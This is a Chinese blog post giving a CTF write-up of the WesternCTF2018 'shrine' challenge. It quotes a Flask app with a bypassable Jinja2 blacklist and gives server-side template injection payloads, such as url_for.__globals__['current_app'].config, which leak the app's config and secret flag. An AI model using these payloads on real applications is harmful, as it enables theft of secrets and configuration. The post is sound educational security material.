[WesternCTF2018]shrine writeup

已于 2022-02-15 19:05:09 修改
阅读量563 收藏 1
点赞数 1
分类专栏: ctf # web 文章标签: flask python ctf ssti web
于 2022-02-15 17:07:01 首次发布
不允许转载
本文链接:https://blog.csdn.net/weixin_46081055/article/details/122948437
版权
ctf 同时被 2 个专栏收录
85 篇文章 9 订阅
订阅专栏
web
48 篇文章 2 订阅
订阅专栏

[WesternCTF2018]shrine

直接思路就是 花式读全局变量

一开始就直接给了源码

import flask
import os

app = flask.Flask(__name__)

app.config['FLAG'] = os.environ.pop('FLAG')     //environ获取系统中的FLAG参数,写入app.config中


@app.route('/')     //访问'/'路径时就显示代码
def index():
    return open(__file__).read()


@app.route('/shrine/<path:shrine>')
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')     //去掉()
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s
        //相当于{% set config=None%}{% set self=None%} + s,先将config和self设为none,达到禁用函数的目的

    return flask.render_template_string(safe_jinja(shrine))     //模板渲染的漏洞处


if __name__ == '__main__':
    app.run(debug=True)

ps 关于os.environ

OS.ENVIRON()详解_Muqingluan

python获得一些有关系统的信息

windows:

os.environ[‘HOMEPATH’]:当前用户主目录。
os.environ[‘TEMP’]:临时目录路径。
os.environ[PATHEXT’]:可执行文件。
os.environ[‘SYSTEMROOT’]:系统主目录。
os.environ[‘LOGONSERVER’]:机器名。
os.environ[‘PROMPT’]:设置提示符。

linux:

os.environ[‘USER’]:当前使用用户。
os.environ[‘LC_COLLATE’]:路径扩展的结果排序时的字母顺序。
os.environ[‘SHELL’]:使用shell的类型。
os.environ[‘LAN’]:使用的语言。
os.environ[‘SSH_AUTH_SOCK’]:ssh的执行路径。

本题的思路就是要读取全局变量(我尝试过构造ssti命令执行的payload,但是__subclasses__()时会报错,失败了

测试一下python的ssti

/shrine/{{8*9}}

image-20220215163246583

因为''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s这段,我们无法直接使用config函数来查看所有app.config内容,得利用python对象之间的引用关系来调用被禁用的函数对象。

current_app的值是当前使用的app,可以通过current_app查看当前app的config

有两个flask内置函数,可以配合globals()函数得到全局变量current_app(url_forget_flashed_messages

flask框架中特有的函数link

url_for()

url_for会根据传入的路由器函数名,返回该路由对应的URL,在模板中始终使用url_for()就可以安全的修改路由绑定的URL,则不比担心模板中渲染出错的链接:

{{url_for('home')}}
/

如果我们定义的路由URL是带有参数的,则可以把它们作为关键字参数传入url_for(),Flask会把他们填充进最终生成的URL中:

{{ url_for('post', post_id=1)}}
/post/1

get_flashed_messages()

这个函数会返回之前在flask中通过flask()传入的消息的列表,flash函数的作用很简单,可以把由Python字符串表示的消息加入一个消息队列中,再使用get_flashed_message()函数取出它们并消费掉:

{%for message in get_flashed_messages()%}
    {{message}}
{%endfor%}

payload:

/shrine/{{url_for.__globals__}}
#current_app': <Flask 'app'>

image-20220215164144351

/shrine/{{url_for.__globals__['current_app'].config}}
或者
/shrine/{{get_flashed_messages.__globals__['current_app'].config}}

image-20220215164252968

参考wp:
[WesternCTF2018]shrine - 春告鳥

shu天
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[WesternCTF2018]shrine
brainw的博客
04-28 468
[WesternCTF2018]shrine import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/...
shrine-webdav:提供用于Shrine的简单WebDAV存储
05-11
gem 'shrine-webdav' 用法 假设您具有报告模型,该模型应该能够将数据存储在远程WebDAV存储中。 class Report < ApplicationRecord end # == Schema Information # # Table name: reports # # id :uuid not ...
buuctf-[WesternCTF2018]shrine(小宇特详解)
小宇的web博客
02-26 1461
buuctf-[WesternCTF2018]shrine(小宇特详解) 1.先看题目 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') //注册了一个名为FLAG的config @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:
NO.2-20 [WesternCTF2018]shrine
nigo134的博客
08-01 309
SSTI模板注入: 模板注入涉及的是服务端Web应用使用模板引擎渲染用户请求的过程 服务端把用户输入的内容渲染成模板就可能造成SSTI(Server-Side Template Injection) 1.模板引擎 模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,用于网站的模板引擎就会生成一个标准的HTML文档。一些模板引擎:Smarty,Mako,Jinja2,Jade,Velocity,Freemaker和Twig 模板引擎可
[Western CTF 2018]shrine
weixin_45751765的博客
02-16 1410
0x00 前言 ssti复习 贴一下源码 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>') def shrine(shrine): def s
shrine-commerce
04-04
MDC-100系列代码实验室入门要获得Flutter入门方面的帮助,请查看我们的在线。
Shrine View-crx插件
04-07
在每次打开一个新标签时,从谷歌地图的卫星视图体验一个有趣的日语Shinto神社。 每次打开一个新选项卡,从谷歌地图的卫星视图享受神社的形象。 神社从5000多点随机选择。 语言:日本語
shrine.cr:适用于Crystal应用程序的文件附件工具包。 受神殿Ruby启发
02-05
shrine.cr:适用于Crystal应用程序的文件附件工具包。 受神殿Ruby启发
shrine:使用Shrine项目的MDC的Android模板项目
05-13
SHRINE-Android学习项目MDC-101-MDC-104:适用于Android的材料组件(Java) 您可以使用Shrine作为模板,使用不同的提交以不同的级别启动新的应用程序。 由brucemakallan编辑
第五十三题——[WesternCTF2018]shrine
分享简单的安全技术
04-29 249
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,看到源码 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>')
渗透学习-CTF篇-web-BUUCTF
qq_43696276的博客
01-17 2075
随着学习的不断深入,为了防止自己忘记之前所学的内容,于是我决定再不断的向下学习的同时做一些ctf的题来唤醒自己的记忆!!
BUUCTF-[WesternCTF2018]shrine
tmyzxy1314的博客
01-13 408
shrine/{{url_for.__globals__}} 输出所有全局变量。不知到是哪一个就一个一个试,这里我知道是current_app。这道题,只要学会了ssti,认真分析代码就可以轻松拿下。/shrine/{{2-2}} 判断是否有ssti漏洞。其实以及获取了flag了但是可以再深入一点。运用Flask函数url_for()访问题目链接是一串python代码。这样不好看,查看源代码。
BUUCTF:[WesternCTF2018]shrine
qq_46230755的博客
12-30 250
打开网页是一题代码审计 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>') def shrine(shrine): def safe_jinj
web buuctf [WesternCTF2018]shrine
weixin_44214568的博客
04-04 1214
考点:模板注入(flask) 1.打开整理代码 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') //显示代码 @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/') def shrine(shrine): def safe_jinja(
flask之ssti [WesternCTF2018]shrine1
最新发布
m0_75178803的博客
03-18 989
打开题目。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

shu天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值